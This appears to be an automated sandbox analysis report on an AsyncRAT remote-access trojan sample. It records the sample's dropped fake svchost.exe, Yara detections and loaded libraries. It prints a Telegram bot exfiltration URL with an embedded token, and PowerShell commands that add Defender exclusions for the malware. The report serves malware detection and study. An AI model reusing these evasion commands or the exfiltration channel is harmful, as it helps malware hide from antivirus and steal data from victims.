Source: file.exe, svchost.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=14704
Source: powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1758662678.0000021F90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860676438.000001B6CE7C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2049175145.000001D6D8F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\file.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: file.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFD9A3BEAD8	0_2_00007FFD9A3BEAD8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFD9A3B1729	0_2_00007FFD9A3B1729
Source: C:\Users\user\AppData\Local\svchost.exe	Code function: 13_2_00007FFD9A3B1729	13_2_00007FFD9A3B1729
Source: C:\Users\user\AppData\Local\svchost.exe	Code function: 13_2_00007FFD9A3B0EFA	13_2_00007FFD9A3B0EFA
Source: C:\Users\user\AppData\Local\svchost.exe	Code function: 15_2_00007FFD9A3E1729	15_2_00007FFD9A3E1729
Source: C:\Users\user\AppData\Local\svchost.exe	Code function: 15_2_00007FFD9A3E0EFA	15_2_00007FFD9A3E0EFA

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: file.exe, NOeCVae6fB2zjxBAfc14EmLdOosAsYjlNm.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, NOeCVae6fB2zjxBAfc14EmLdOosAsYjlNm.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: file.exe, ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.cs	Base64 encoded string: 'ta7GHZZtD9Rz9IBXmd/SpSUoGBZgF8D2U0oyAOugQ4G6hHShXsyaGQ2h8riD1hV1', 'UNfylT+ryI+XA32XWRzLnhoMnqJUBvWEg8rgYaRQtvF9wcNAO6k744MbWWjJRb2q', 'tkS+N2y8FkE/r23RNPy9SCqUiE5h5Li6jxPBYAdlAIjh5tIKqb/fkKLTy+L2Gxag', 'iY7f7aTbdJawkU6QvQRhrlcMmB/lqyxnCZoNZrmcP3abgn7O/Y3/4sJ6jS3+zDQV'
Source: file.exe, ke6P6rtJCZBKy9hI.cs	Base64 encoded string: 'O46K0znAANd6Cs48nFx1Ftd2U7elGFLnRf429fMlXFzEmmEUd6ziq5iuasvezPiGhcKEhMhGrCGQXdLAV5iW', 'sXP3Zf4kA5Vt7mYQlkzVHJpUmfwYCi5XAvQ87JPTIxj5DvLqtqIE9acLV51H2gGxUyqkYzgwvbiuupwjK7my', 'IWhXJG0jCqHLgL4Bw9TOYnQmV6wz1ncGepE8Pxh6EsXBpwIE1ABJWDlfCCz0LCK4H21jztKUYP4dnSNhYdmp', 'p2MQSqhbr3NQ2evxyCDUsWKg7OAiwLoukyjrQnXT6YXpzztfrp2fMKXob27vkcv7M9DEeGGYGQBxb1tOcBri', 'xhNxCMrPSGqhfIo1Vila4F7nkyrLVDAy4G5ZYH7EztvXrsGmRDWLOzFiIeqJroacZWU7iS5N6KBLDewXc2rI'
Source: svchost.exe.0.dr, ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.cs	Base64 encoded string: 'ta7GHZZtD9Rz9IBXmd/SpSUoGBZgF8D2U0oyAOugQ4G6hHShXsyaGQ2h8riD1hV1', 'UNfylT+ryI+XA32XWRzLnhoMnqJUBvWEg8rgYaRQtvF9wcNAO6k744MbWWjJRb2q', 'tkS+N2y8FkE/r23RNPy9SCqUiE5h5Li6jxPBYAdlAIjh5tIKqb/fkKLTy+L2Gxag', 'iY7f7aTbdJawkU6QvQRhrlcMmB/lqyxnCZoNZrmcP3abgn7O/Y3/4sJ6jS3+zDQV'
Source: svchost.exe.0.dr, ke6P6rtJCZBKy9hI.cs	Base64 encoded string: 'O46K0znAANd6Cs48nFx1Ftd2U7elGFLnRf429fMlXFzEmmEUd6ziq5iuasvezPiGhcKEhMhGrCGQXdLAV5iW', 'sXP3Zf4kA5Vt7mYQlkzVHJpUmfwYCi5XAvQ87JPTIxj5DvLqtqIE9acLV51H2gGxUyqkYzgwvbiuupwjK7my', 'IWhXJG0jCqHLgL4Bw9TOYnQmV6wz1ncGepE8Pxh6EsXBpwIE1ABJWDlfCCz0LCK4H21jztKUYP4dnSNhYdmp', 'p2MQSqhbr3NQ2evxyCDUsWKg7OAiwLoukyjrQnXT6YXpzztfrp2fMKXob27vkcv7M9DEeGGYGQBxb1tOcBri', 'xhNxCMrPSGqhfIo1Vila4F7nkyrLVDAy4G5ZYH7EztvXrsGmRDWLOzFiIeqJroacZWU7iS5N6KBLDewXc2rI'

Source: svchost.exe.0.dr, ke6P6rtJCZBKy9hI.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, ke6P6rtJCZBKy9hI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: file.exe, ke6P6rtJCZBKy9hI.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: file.exe, ke6P6rtJCZBKy9hI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/21@1/2

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\svchost.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\svchost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\M16cgyrAaBGwyqZG
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\svchost.exe "C:\Users\user\AppData\Local\svchost.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\svchost.exe "C:\Users\user\AppData\Local\svchost.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
